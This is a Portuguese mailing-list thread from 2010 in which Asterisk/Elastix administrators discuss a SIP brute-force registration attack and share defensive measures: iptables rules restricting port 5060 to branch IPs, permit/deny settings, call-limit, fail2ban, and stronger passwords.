Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Com o exemplo do JOCA, não é necessário o uso do fail2ban e nem a alteração de porta (estas opções são para situações onde nao se tem um ponto fixo de clientes, assim as conexões partem de qualquer parte do mundo). =D Em 23 de novembro de 2010 14:54, Joca escreveu: > Usa o iptables tmb > > exemplo abaixo > > #ip publico do asterisk > IP=200.x.x.x > > #ips da filial > FILIAL1=189.x.x.x > FILIAL2=188.x.x.x > FILIAL3=187.x.x.x > FILIAL4=186.x.x.x > > iptables -A INPUT -s $FILIAL1 -d $IP -p all --dport 5060 -j ACCEPT > iptables -A OUTPUT -d $FILIAL1 -s $IP -p all --sport 5060 -j ACCEPT > > iptables -A INPUT -s $FILIAL2 -d $IP -p all --dport 5060 -j ACCEPT > iptables -A OUTPUT -d $FILIAL2 -s $IP -p all --sport 5060 -j ACCEPT > > iptables -A INPUT -s $FILIAL3 -d $IP -p all --dport 5060 -j ACCEPT > iptables -A OUTPUT -d $FILIAL3 -s $IP -p all --sport 5060 -j ACCEPT > > iptables -A INPUT -s $FILIAL4 -d $IP -p all --dport 5060 -j ACCEPT > iptables -A OUTPUT -d $FILIAL4 -s $IP -p all --sport 5060 -j ACCEPT > > iptables -A INPUT -s 0/0 -d $IP -p all --dport 5060 -j DROP > iptables -A OUTPUT -d 0/0 -s $IP -p all --sport 5060 -j DROP > > > Gian Nicodemus wrote: > > Num rola de implementar um fail2ban no elastix?? > > > > > > -- > > Gian Nicodemus > > Analista de sistemas > > giannicode...@gmail.com <mailto:giannicode...@gmail.com> > > > > > > Em 23 de novembro de 2010 13:56, Nielsen Alves de Oliveira > > mailto:niel...@freesolutions.com.br>> > > escreveu: > > > > Mais uma dica muito boa do colaborador Wagner, alterar a porta > > padrão, pois todos os SCRIPTS MALICIOSOS estão orientados as > > portas padrões. > > > > > > Sobre a call-limit=NUMERO DE LIGAÇÕES > > > > esta configuração fica no arquivo sip.conf > > em [general] > > call-limit=3 (numero de ligações simultaneas que é permitida pelo > > ramal) > > > > OU SETAR INDIVIDUAL POR CADA RAMAL(EXTENSION) =] > > > > VEJA MAIS ABAIXO > > > > http://www.voip-info.org/wiki/view/Asterisk+config+sip.conf > > > > > > Vlw. > > > > Em 23 de novembro de 2010 09:41, Wagner > <mailto:wag...@beetelecom.com.br>> escreveu: > > > > Gleidison, > > > > A caracteristica deste log indica que o ataque sofrido foi do > > tipo força bruta, como mencionei na lista técnica se possivel > > tente alterar a porta padrão 5060, isso é claro requer que > > todos os seus peers sejam reprogramados porém obtive bons > > resultados com esta alteração em meu ambiente. > > > > Att > > Wagner Penha > > > > - Original Message - > > > > *From:* Gleidison Sampaio > > <mailto:gleidison.samp...@hotmail.com> > > *To:* alejandrorflo...@gmail.com > > <mailto:alejandrorflo...@gmail.com> > > *Cc:* Asterisk Lista > > <mailto:asteriskbrasil@listas.asteriskbrasil.org> > > *Sent:* Monday, November 22, 2010 5:49 PM > > *Subject:* Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) > > Elastix 1.6 > > > > Para minha "Surpresa" tem um IP dos EUA, mais tem um > > arquivo de log de mais de 40 mb só com essa mensagem. caso > > alguem tenha alguma dica, alem de reforçar a senha, que ja > > criei uma que EU nunca vou decorar essa senha, com > > caracteres, letras, numeros, maiusculas e minusculas, > > porem uma dica para aumentar mais a segurança vai bem, e > > pra garantir tbem estou subindo essa maquina em outro IP > > com uma faixa bem diferente. > > > > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > > from '"3450595069" ' > > failed for '184.106.132.239' - No matching peer found > > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > > from '"3450595069" ' > > failed for '184.106.132.239' - No matching peer found > > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > > from '"3450595069" ' > > failed for '184.106.132.239' - No matching peer found > > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > > from '"34
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Usa o iptables tmb exemplo abaixo #ip publico do asterisk IP=200.x.x.x #ips da filial FILIAL1=189.x.x.x FILIAL2=188.x.x.x FILIAL3=187.x.x.x FILIAL4=186.x.x.x iptables -A INPUT -s $FILIAL1 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL1 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s $FILIAL2 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL2 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s $FILIAL3 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL3 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s $FILIAL4 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL4 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s 0/0 -d $IP -p all --dport 5060 -j DROP iptables -A OUTPUT -d 0/0 -s $IP -p all --sport 5060 -j DROP Gian Nicodemus wrote: > Num rola de implementar um fail2ban no elastix?? > > > -- > Gian Nicodemus > Analista de sistemas > giannicode...@gmail.com <mailto:giannicode...@gmail.com> > > > Em 23 de novembro de 2010 13:56, Nielsen Alves de Oliveira > mailto:niel...@freesolutions.com.br>> > escreveu: > > Mais uma dica muito boa do colaborador Wagner, alterar a porta > padrão, pois todos os SCRIPTS MALICIOSOS estão orientados as > portas padrões. > > > Sobre a call-limit=NUMERO DE LIGAÇÕES > > esta configuração fica no arquivo sip.conf > em [general] > call-limit=3 (numero de ligações simultaneas que é permitida pelo > ramal) > > OU SETAR INDIVIDUAL POR CADA RAMAL(EXTENSION) =] > > VEJA MAIS ABAIXO > > http://www.voip-info.org/wiki/view/Asterisk+config+sip.conf > > > Vlw. > > Em 23 de novembro de 2010 09:41, Wagner <mailto:wag...@beetelecom.com.br>> escreveu: > > Gleidison, > > A caracteristica deste log indica que o ataque sofrido foi do > tipo força bruta, como mencionei na lista técnica se possivel > tente alterar a porta padrão 5060, isso é claro requer que > todos os seus peers sejam reprogramados porém obtive bons > resultados com esta alteração em meu ambiente. > > Att > Wagner Penha > > - Original Message - > > *From:* Gleidison Sampaio > <mailto:gleidison.samp...@hotmail.com> > *To:* alejandrorflo...@gmail.com > <mailto:alejandrorflo...@gmail.com> > *Cc:* Asterisk Lista > <mailto:asteriskbrasil@listas.asteriskbrasil.org> > *Sent:* Monday, November 22, 2010 5:49 PM > *Subject:* Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) > Elastix 1.6 > > Para minha "Surpresa" tem um IP dos EUA, mais tem um > arquivo de log de mais de 40 mb só com essa mensagem. caso > alguem tenha alguma dica, alem de reforçar a senha, que ja > criei uma que EU nunca vou decorar essa senha, com > caracteres, letras, numeros, maiusculas e minusculas, > porem uma dica para aumentar mais a segurança vai bem, e > pra garantir tbem estou subindo essa maquina em outro IP > com uma faixa bem diferente. > > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > from '"3450595069" ' > failed for '184.106.132.239' - No matching peer found > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > from '"3450595069" ' > failed for '184.106.132.239' - No matching peer found > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > from '"3450595069" ' > failed for '184.106.132.239' - No matching peer found > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > from '"3450595069" ' > failed for '184.106.132.239' - No matching peer found > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration > from '"3450595069" ' > failed for '184.106.132.239' - No matching peer found > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > > > Date: Mon, 22 Nov 2010 16:33:22 -0300 > > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) > Elastix 1.6 > > From: alejandrorflo...@gmail.com > <mailto:alejandrorflo...@gmail.com> > > To: gleidison.samp...@hotmail.com >
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Concerteza ROLA ! Desde que sempre audite os bans ! =D Em 23 de novembro de 2010 13:12, Gian Nicodemus escreveu: > Num rola de implementar um fail2ban no elastix?? > > > -- > Gian Nicodemus > Analista de sistemas > giannicode...@gmail.com > > > Em 23 de novembro de 2010 13:56, Nielsen Alves de Oliveira < > niel...@freesolutions.com.br> escreveu: > > Mais uma dica muito boa do colaborador Wagner, alterar a porta padrão, pois >> todos os SCRIPTS MALICIOSOS estão orientados as portas padrões. >> >> >> Sobre a call-limit=NUMERO DE LIGAÇÕES >> >> esta configuração fica no arquivo sip.conf >> em [general] >> call-limit=3 (numero de ligações simultaneas que é permitida pelo ramal) >> >> OU SETAR INDIVIDUAL POR CADA RAMAL(EXTENSION) =] >> >> VEJA MAIS ABAIXO >> >> http://www.voip-info.org/wiki/view/Asterisk+config+sip.conf >> >> >> Vlw. >> >> Em 23 de novembro de 2010 09:41, Wagner escreveu: >> >>> Gleidison, >>> >>> A caracteristica deste log indica que o ataque sofrido foi do tipo força >>> bruta, como mencionei na lista técnica se possivel tente alterar a porta >>> padrão 5060, isso é claro requer que todos os seus peers sejam reprogramados >>> porém obtive bons resultados com esta alteração em meu ambiente. >>> >>> Att >>> Wagner Penha >>> >>> - Original Message - >>> >>> *From:* Gleidison Sampaio >>> *To:* alejandrorflo...@gmail.com >>> *Cc:* Asterisk Lista >>> *Sent:* Monday, November 22, 2010 5:49 PM >>> *Subject:* Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 >>> >>> Para minha "Surpresa" tem um IP dos EUA, mais tem um arquivo de log de >>> mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de >>> reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com >>> caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para >>> aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa >>> maquina em outro IP com uma faixa bem diferente. >>> >>> [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from >>> '"3450595069" ' failed for >>> '184.106.132.239' - No matching peer found >>> [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from >>> '"3450595069" ' failed for >>> '184.106.132.239' - No matching peer found >>> [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from >>> '"3450595069" ' failed for >>> '184.106.132.239' - No matching peer found >>> [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from >>> '"3450595069" ' failed for >>> '184.106.132.239' - No matching peer found >>> [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from >>> '"3450595069" ' failed for >>> '184.106.132.239' - No matching peer found >>> >>> >>> >>> >>> Att; >>> >>> *Gleidison C. Sampaio* >>> >>> >>> >>> >>> >>> >>> > Date: Mon, 22 Nov 2010 16:33:22 -0300 >>> > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 >>> > From: alejandrorflo...@gmail.com >>> > To: gleidison.samp...@hotmail.com >>> > CC: asteriskbrasil@listas.asteriskbrasil.org >>> > >>> > Opa, >>> > >>> > >>> > > Alejandro, >>> > > Na verdade nao sou la aqueles especialistas, poderia me dizer onde >>> verifico >>> > > o log dos ramais, tipo o IP Publico que cada ramal se logou. >>> > >>> > Os logs do asterisk ficam em: >>> > /var/log/asterisk/full >>> > >>> > Verifica nesse arquivo. >>> > Outra coisa é via console do asterisk executar o comando: sip show >>> peers >>> > que vai te mostrar que ramais estão online e qual ip de origem. >>> > >>> > >>> > -- >>> > Abraço, >>> > Alejandro Flores >>> > http://www.triforsec.com.br/ >>> >>> -- >>> >>> ___ >>> KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. >>> - Hardware com alta disponibilidade de recursos e qualidade KHOMP >&
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Num rola de implementar um fail2ban no elastix?? -- Gian Nicodemus Analista de sistemas giannicode...@gmail.com Em 23 de novembro de 2010 13:56, Nielsen Alves de Oliveira < niel...@freesolutions.com.br> escreveu: > Mais uma dica muito boa do colaborador Wagner, alterar a porta padrão, pois > todos os SCRIPTS MALICIOSOS estão orientados as portas padrões. > > > Sobre a call-limit=NUMERO DE LIGAÇÕES > > esta configuração fica no arquivo sip.conf > em [general] > call-limit=3 (numero de ligações simultaneas que é permitida pelo ramal) > > OU SETAR INDIVIDUAL POR CADA RAMAL(EXTENSION) =] > > VEJA MAIS ABAIXO > > http://www.voip-info.org/wiki/view/Asterisk+config+sip.conf > > > Vlw. > > Em 23 de novembro de 2010 09:41, Wagner escreveu: > >> Gleidison, >> >> A caracteristica deste log indica que o ataque sofrido foi do tipo força >> bruta, como mencionei na lista técnica se possivel tente alterar a porta >> padrão 5060, isso é claro requer que todos os seus peers sejam reprogramados >> porém obtive bons resultados com esta alteração em meu ambiente. >> >> Att >> Wagner Penha >> >> - Original Message - >> >> *From:* Gleidison Sampaio >> *To:* alejandrorflo...@gmail.com >> *Cc:* Asterisk Lista >> *Sent:* Monday, November 22, 2010 5:49 PM >> *Subject:* Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 >> >> Para minha "Surpresa" tem um IP dos EUA, mais tem um arquivo de log de >> mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de >> reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com >> caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para >> aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa >> maquina em outro IP com uma faixa bem diferente. >> >> [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from >> '"3450595069" ' failed for >> '184.106.132.239' - No matching peer found >> [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" >> ' failed for '184.106.132.239' - No >> matching peer found >> [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" >> ' failed for '184.106.132.239' - No >> matching peer found >> [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" >> ' failed for '184.106.132.239' - No >> matching peer found >> [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" >> ' failed for '184.106.132.239' - No >> matching peer found >> >> >> >> >> Att; >> >> *Gleidison C. Sampaio* >> >> >> >> >> >> >> > Date: Mon, 22 Nov 2010 16:33:22 -0300 >> > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 >> > From: alejandrorflo...@gmail.com >> > To: gleidison.samp...@hotmail.com >> > CC: asteriskbrasil@listas.asteriskbrasil.org >> > >> > Opa, >> > >> > >> > > Alejandro, >> > > Na verdade nao sou la aqueles especialistas, poderia me dizer onde >> verifico >> > > o log dos ramais, tipo o IP Publico que cada ramal se logou. >> > >> > Os logs do asterisk ficam em: >> > /var/log/asterisk/full >> > >> > Verifica nesse arquivo. >> > Outra coisa é via console do asterisk executar o comando: sip show peers >> > que vai te mostrar que ramais estão online e qual ip de origem. >> > >> > >> > -- >> > Abraço, >> > Alejandro Flores >> > http://www.triforsec.com.br/ >> >> -- >> >> ___ >> KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. >> - Hardware com alta disponibilidade de recursos e qualidade KHOMP >> - Suporte técnico local qualificado e gratuito >> Conheça a linha completa de produtos KHOMP em www.khomp.com.br >> ___ >> Temos tudo para seu projeto VoIP com Asterisk! >> Descontos especiais para assinantes da AsteriskBrasil.org. >> Registre-se e receba um cupom exclusivo de desconto! >> Acesse agora www.voipmania.com.br >> __ >> Lista de discussões AsteriskBrasil.org >> AsteriskBrasil@listas.asteriskbrasil.org >> http://listas.asteriskbrasil.org/ma
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Mais uma dica muito boa do colaborador Wagner, alterar a porta padrão, pois todos os SCRIPTS MALICIOSOS estão orientados as portas padrões. Sobre a call-limit=NUMERO DE LIGAÇÕES esta configuração fica no arquivo sip.conf em [general] call-limit=3 (numero de ligações simultaneas que é permitida pelo ramal) OU SETAR INDIVIDUAL POR CADA RAMAL(EXTENSION) =] VEJA MAIS ABAIXO http://www.voip-info.org/wiki/view/Asterisk+config+sip.conf Vlw. Em 23 de novembro de 2010 09:41, Wagner escreveu: > Gleidison, > > A caracteristica deste log indica que o ataque sofrido foi do tipo força > bruta, como mencionei na lista técnica se possivel tente alterar a porta > padrão 5060, isso é claro requer que todos os seus peers sejam reprogramados > porém obtive bons resultados com esta alteração em meu ambiente. > > Att > Wagner Penha > > - Original Message - > > *From:* Gleidison Sampaio > *To:* alejandrorflo...@gmail.com > *Cc:* Asterisk Lista > *Sent:* Monday, November 22, 2010 5:49 PM > *Subject:* Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > Para minha "Surpresa" tem um IP dos EUA, mais tem um arquivo de log de mais > de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de > reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com > caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para > aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa > maquina em outro IP com uma faixa bem diferente. > > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from > '"3450595069" ' failed for > '184.106.132.239' - No matching peer found > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" > ' failed for '184.106.132.239' - No > matching peer found > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" > ' failed for '184.106.132.239' - No > matching peer found > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" > ' failed for '184.106.132.239' - No > matching peer found > [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" > ' failed for '184.106.132.239' - No > matching peer found > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > > > Date: Mon, 22 Nov 2010 16:33:22 -0300 > > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > From: alejandrorflo...@gmail.com > > To: gleidison.samp...@hotmail.com > > CC: asteriskbrasil@listas.asteriskbrasil.org > > > > Opa, > > > > > > > Alejandro, > > > Na verdade nao sou la aqueles especialistas, poderia me dizer onde > verifico > > > o log dos ramais, tipo o IP Publico que cada ramal se logou. > > > > Os logs do asterisk ficam em: > > /var/log/asterisk/full > > > > Verifica nesse arquivo. > > Outra coisa é via console do asterisk executar o comando: sip show peers > > que vai te mostrar que ramais estão online e qual ip de origem. > > > > > > -- > > Abraço, > > Alejandro Flores > > http://www.triforsec.com.br/ > > -- > > ___ > KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. > - Hardware com alta disponibilidade de recursos e qualidade KHOMP > - Suporte técnico local qualificado e gratuito > Conheça a linha completa de produtos KHOMP em www.khomp.com.br > ___ > Temos tudo para seu projeto VoIP com Asterisk! > Descontos especiais para assinantes da AsteriskBrasil.org. > Registre-se e receba um cupom exclusivo de desconto! > Acesse agora www.voipmania.com.br > __ > Lista de discussões AsteriskBrasil.org > AsteriskBrasil@listas.asteriskbrasil.org > http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil > __ > Para remover seu email desta lista, basta enviar um email em branco para > asteriskbrasil-unsubscr...@listas.asteriskbrasil.org > > -- > > > No virus found in this incoming message. > Checked by AVG - www.avg.com > Version: 8.5.449 / Virus Database: 271.1.1/3271 - Release Date: 11/21/10 > 19:35:00 > > > -- > Estou utilizando a versão gratuita de SPAMfighter para usuários privados. > Foi removido 3367 emails de spam até hoje. > Experimente SPAMfighter <http://www.spamfighter.com/lpt> de graça agora! > > C
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Gleidison, A caracteristica deste log indica que o ataque sofrido foi do tipo força bruta, como mencionei na lista técnica se possivel tente alterar a porta padrão 5060, isso é claro requer que todos os seus peers sejam reprogramados porém obtive bons resultados com esta alteração em meu ambiente. Att Wagner Penha - Original Message - From: Gleidison Sampaio To: alejandrorflo...@gmail.com Cc: Asterisk Lista Sent: Monday, November 22, 2010 5:49 PM Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Para minha "Surpresa" tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found Att; Gleidison C. Sampaio > Date: Mon, 22 Nov 2010 16:33:22 -0300 > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > From: alejandrorflo...@gmail.com > To: gleidison.samp...@hotmail.com > CC: asteriskbrasil@listas.asteriskbrasil.org > > Opa, > > > > Alejandro, > > Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico > > o log dos ramais, tipo o IP Publico que cada ramal se logou. > > Os logs do asterisk ficam em: > /var/log/asterisk/full > > Verifica nesse arquivo. > Outra coisa é via console do asterisk executar o comando: sip show peers > que vai te mostrar que ramais estão online e qual ip de origem. > > > -- > Abraço, > Alejandro Flores > http://www.triforsec.com.br/ -- ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org -- No virus found in this incoming message. Checked by AVG - www.avg.com Version: 8.5.449 / Virus Database: 271.1.1/3271 - Release Date: 11/21/10 19:35:00 -- Estou utilizando a versão gratuita de SPAMfighter para usuários privados. Foi removido 3367 emails de spam até hoje. Os usuários pagantes não têm esta mensagem nos seus emails. Adquira SPAMfighter grátis aqui: http://www.spamfighter.com/lpt ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Nielsen, Só uma duvida, eu devo acrescentar o contexto abaixo no SIP.CONF? ; call-limit=1 ; permit only 1 outgoing call and 1 incoming call at a time; from the phone to asterisk; (1 for the explicit peer, 1 for the explicit user,; remember that a friend equals 1 peer and 1 user in; memory) From: niel...@freesolutions.com.br Date: Tue, 23 Nov 2010 08:36:28 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Olá bom dia ! Obrigado amigo pela consideração, contudo sobre a sua ultima dúvida tem como limitar pro tuonco (que vc já o fez) e por ramais, a configuração é feita nos ramais e se chama CALL-LIMIT=1. No link tem mais informações = http://forums.digium.com/viewtopic.php?p=12157 Estamos ai para oque precisar. Lembrando que este é o assunto mais sério que devemos tratar entre nós, peço a participação de todos. Obrigado mais uma vez. Em 23 de novembro de 2010 08:23, Gleidison Sampaio escreveu: Bom dia Lista! Bom primeiramente quero agradecer a ajuda que o Nielsen e o Alejandro me deram, e aproveitar pra postar o que eu fiz no servidor o que eu tomei de providencias em cima das dicas e recomendações que os nobres colegas me deram. 1 - Como eu tinha mais IP Publico disponível, mudei o IP do Asterisk; 2 - Como nas filiais são IP Fixo, eu usei o parâmetro "permit e deny" conforme recomendação do Nielsen; 3- Coloquei uma senha "FORTE" para cada ramal; incluindo letras, números e caracteres; 4- Como a Operadora de VoIP é nossa mesmo e eu tenho a Administração, mudei também o plano de discagem para ligaçoes internacionais, ou seja nao é o plano padrao de discar 00 + Codigo do Pais + Numero de telefone; 5- A quinta providencia ainda nao consegui realizar, que é limitar para apenas uma ligação por ramal, o que estou montando é um Trunk SIP para cada Filial e limitando no Trunk no parametro "Maximum Channels" para apenas 2 chamadas simultâneas. visto que nossa operadora permite infinitas chamadas simultâneas em um mesmo tronco. Sendo assim que sirva de alerta para os caros colegas, se possivel preciso só de mais uma ajuda de limitar as chamadas por ramais. Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 17:24:43 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Depois da senha estes procedimentos que o amigo postou ai (nível de rede) são os mais críticos e elimina mais de 90% dos problemas de segurança, de resto só fica a confiança no código do asterisk (nível de aplicação). =D Em 22 de novembro de 2010 17:03, Rodrigo Vian escreveu: seus ramais possuem ip fixo podes utilizar os parâmetros: deny=0.0.0.0/0.0.0.0 permit=222.111.222.1/255.255.255.255 Com esses parâmetros você somente vai permitir login a partir do ip especificado... Se tiver controle de firewall, pode utilizar fail2ban... Abs Mensagem original De: Gleidison Sampaio Responder a: asteriskbrasil@listas.asteriskbrasil.org Para: alejandrorflo...@gmail.com Cc: Asterisk Lista Assunto: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Data: Mon, 22 Nov 2010 15:49:04 -0400 Para minha "Surpresa" tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '"3450595069" ' failed for '184.106.132.239' - No matching peer found Att; Gleidison C. Sampaio > Date: Mon, 22 Nov 2010 16:33:22 -0300 > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > From: alejandrorflo...@gmail.com > To: gleidison.samp...@hotmail.com > CC: asteriskbrasil@listas.asteriskbrasil.org > >
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Olá bom dia ! Obrigado amigo pela consideração, contudo sobre a sua ultima dúvida tem como limitar pro tuonco (que vc já o fez) e por ramais, a configuração é feita nos ramais e se chama CALL-LIMIT=1. No link tem mais informações = http://forums.digium.com/viewtopic.php?p=12157 Estamos ai para oque precisar. Lembrando que este é o assunto mais sério que devemos tratar entre nós, peço a participação de todos. Obrigado mais uma vez. Em 23 de novembro de 2010 08:23, Gleidison Sampaio < gleidison.samp...@hotmail.com> escreveu: > > Bom dia Lista! > > Bom primeiramente quero agradecer a ajuda que o Nielsen e o Alejandro me > deram, e aproveitar pra postar o que eu fiz no servidor o que eu tomei de > providencias em cima das dicas e recomendações que os nobres colegas me > deram. > > 1 - Como eu tinha mais IP Publico disponível, mudei o IP do Asterisk; > > 2 - Como nas filiais são IP Fixo, eu usei o parâmetro "permit e deny" > conforme recomendação do Nielsen; > > 3- Coloquei uma senha "FORTE" para cada ramal; incluindo letras, números e > caracteres; > > 4- Como a Operadora de VoIP é nossa mesmo e eu tenho a Administração, > mudei também o plano de discagem para ligaçoes internacionais, ou seja nao é > o plano padrao de discar 00 + Codigo do Pais + Numero de telefone; > > 5- A quinta providencia ainda nao consegui realizar, que é limitar para > apenas uma ligação por ramal, o que estou montando é um Trunk SIP para > cada Filial e limitando no Trunk no parametro "Maximum > Channels<https://189.58.111.243/config.php?display=trunks&extdisplay=OUT_2>" > para apenas 2 chamadas simultâneas. visto que nossa operadora permite > infinitas chamadas simultâneas em um mesmo tronco. > > Sendo assim que sirva de alerta para os caros colegas, se possivel preciso > só de mais uma ajuda de limitar as chamadas por ramais. > > > > > Att; > > *Gleidison C. Sampaio* > > > ---------- > From: niel...@freesolutions.com.br > Date: Mon, 22 Nov 2010 17:24:43 -0300 > > To: 